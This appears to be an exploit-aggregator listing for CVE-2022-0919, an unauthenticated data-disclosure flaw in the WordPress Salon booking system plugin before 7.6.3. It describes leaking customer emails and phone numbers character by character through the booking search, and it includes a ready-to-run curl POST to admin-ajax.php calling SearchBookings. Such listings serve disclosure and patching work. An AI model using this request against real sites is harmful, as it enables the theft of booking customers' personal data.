Exploit for Salon booking system < 7.6.3 - Unauthenticated Sensitive Data Disclosure CVE-2022-0919

Name: Exploit for Salon booking system < 7.6.3 - Unauthenticated Sensitive Data Disclosure CVE-2022-0919
Rating: 5 (190 reviews)

2022-03-21 | CVSS 5.0

## https://sploitus.com/exploit?id=WPEX-ID:E8F32E0B-4A89-460B-BB78-7C83EF5E16B4
Although the API only returns the name of customer, the search feature can be abused to leak email and phone, for example, search "a@", "b@", "c@"... to determine email address char by char.

curl -X POST https://example.com/wp-admin/admin-ajax.php -d 'action=salon&day=2022-03-11&search=%40&method=SearchBookings'